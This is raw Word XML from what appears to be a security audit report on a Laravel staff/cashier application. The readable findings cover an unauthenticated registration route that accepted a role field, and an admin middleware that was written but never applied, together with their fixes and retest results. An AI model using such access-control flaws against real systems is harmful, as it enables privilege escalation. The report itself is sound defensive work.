coordsize="22479,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&#10;">
                <v:shape id="Shape 530" o:spid="_x0000_s1027" style="position:absolute;left:15049;width:7525;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7524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HdRwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/dTsIw&#10;FL434R2aQ+KddICiDAohBKNcLaAPcFgP28J62rTdmG9vL0y8/PL9r7eDaUVPPjSWFUwnGQji0uqG&#10;KwXfX+9PbyBCRNbYWiYFPxRguxk9rDHX9s4n6s+xEimEQ44K6hhdLmUoazIYJtYRJ+5qvcGYoK+k&#10;9nhP4aaVsyxbSIMNp4YaHe1rKm/nzihwH7OD7y5FeXjdHZe9dd1zUXRKPY6H3QpEpCH+i//cn1rB&#10;yzzNT2fSEZCbXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBceHdRwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l742950,v2630,,4875,930,6735,2787c751545,4648,752475,6893,752475,9525r,114300c752475,126454,751545,128699,749685,130559v-1860,1858,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-933,-6735,-2791c930,128699,,126454,,123825l,9525c,6893,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,752475,133350"/>
                </v:shape>
                <v:shape id="Shape 533" o:spid="_x0000_s1028" style="position:absolute;left:24003;width:3429;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3429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wdawwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8Ba8aerqilSjLKKwR62Cens0z7bavNQmq9Vfb4QFj8PMfMNMZo0pxZVqV1hW0OtGIIhT&#10;qwvOFGw3y84IhPPIGkvLpOBODmbTj9YEY21vvKZr4jMRIOxiVJB7X8VSujQng65rK+LgHW1t0AdZ&#10;Z1LXeAtwU8qvKBpKgwWHhRwrmueUnpM/o2B1mF/sIku1tOVo/xie7gPeJUq1P5ufMQhPjX+H/9u/&#10;WsF3vw+vM+EIyOkTAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAH7MHWsMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l333375,v2630,,4875,930,6735,2787c341970,4648,342900,6893,342900,9525r,114300c342900,126454,341970,128699,340110,130559v-1860,1858,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-933,-6735,-2791c930,128699,,126454,,123825l,9525c,6893,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,342900,133350"/>
                </v:shape>
                <v:shape id="Shape 539" o:spid="_x0000_s1029" style="position:absolute;left:4953;top:4381;width:8667;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8667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a6lxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfC/5DuIIvpWZVWupqFCkItvRFtx9wSa6b1c3NkqTu+vdNodDHYWbOMOvt4FpxoxAbzwpm0wIE&#10;sfam4VrBV7V/egURE7LB1jMpuFOE7Wb0sMbS+J6PdDulWmQIxxIV2JS6UsqoLTmMU98RZ+/sg8OU&#10;ZailCdhnuGvlvChepMOG84LFjt4s6evp2ylY0GfvwuPHOy8vlT4kPVSzs1VqMh52KxCJhvQf/msf&#10;jILnxRJ+z+QjIDc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKN9rqXEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l857250,v2630,,4875,930,6735,2787c865845,4648,866775,6896,866775,9525r,114300c866775,126454,865845,128699,863985,130559v-1860,1858,-4105,2788,-6735,2791l9525,133350v-2630,-3,-4875,-933,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,866775,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>treated as ordinary user input rather than as a privilege assignment. Either alone is survivable; together they are total compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C197CA8" w14:textId="5A7FBBE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The route moved inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth:sanctum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin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Registration no longer issues a token at all: an administrator creating a staff account has no business receiving that account's session. Password policy strengthened (V-05c).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EDD47" w14:textId="0F17E245" w:rsidR="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00E868FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:after="725"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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POST /register</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> unauthenticated → </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, no user created. As a cashier → </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0097BD89"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64BCA063"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4D05E5A2"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2A159977"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23D1DDFA"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638824BE"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2258E0FD"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3A4CD314"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344CA70D" w14:textId="77777777" w:rsidR="00287B7F" w:rsidRDefault="00287B7F" w:rsidP="00287B7F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687B86CB" w14:textId="304A7A90" w:rsidR="005C54CB" w:rsidRPr="00CA733A" w:rsidRDefault="008125F0" w:rsidP="00287B7F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA733A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>V-02 · The role gate was written and never applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1662C" w14:textId="23F426A6" w:rsidR="00345BB3" w:rsidRDefault="008125F0" w:rsidP="005C54CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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A01:2021 / API5:2023 BFLA · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-285</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Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC0DBC8" w14:textId="77777777" w:rsidR="005C54CB" w:rsidRPr="005C54CB" w:rsidRDefault="005C54CB" w:rsidP="005C54CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A979AF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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Evidence.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application already contained a correct implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADDDEE" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="224"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771F89FA" wp14:editId="0FFD2BC4">
                <wp:extent cx="6480126" cy="1847850"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="28832" name="Group 28832"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1847850"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1847850"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="460" name="Shape 460"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="1409700"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="1409700">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="481"/>
                                  <a:pt x="6474764" y="1448"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="1404665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="1408246"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="1409213"/>
                                  <a:pt x="6470001" y="1409697"/>
                                  <a:pt x="6467474" y="1409700"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="1409700"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="1409697"/>
                                  <a:pt x="14094" y="1409213"/>
                                  <a:pt x="11760" y="1408246"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="1407279"/>
                                  <a:pt x="7366" y="1405902"/>
                                  <a:pt x="5580" y="1404119"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="1402330"/>
                                  <a:pt x="2417" y="1400271"/>
                                  <a:pt x="1450" y="1397936"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1390650"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11757"/>
                                </a:ln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554" name="Rectangle 554"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="155029"/>
                            <a:ext cx="3259643" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4B398EEF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>// app/Http/Middleware/AdminMiddleware.php:25</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="555" name="Rectangle 555"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="326479"/>
                            <a:ext cx="2969897" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="387204C3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>if ($request-&gt;</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>user(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>)-&gt;</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>role !</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>== 'admin</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>') {</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="556" name="Rectangle 556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="497929"/>
                            <a:ext cx="289746" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="31D6DB6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557" name="Rectangle 557"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="497929"/>
                            <a:ext cx="2607714" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65061F9D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">return </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>response(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>)-&gt;</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>json</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 403);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="558" name="Rectangle 558"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="669379"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59502C44"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559" name="Rectangle 559"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1012279"/>
                            <a:ext cx="1810913" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="023156C2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
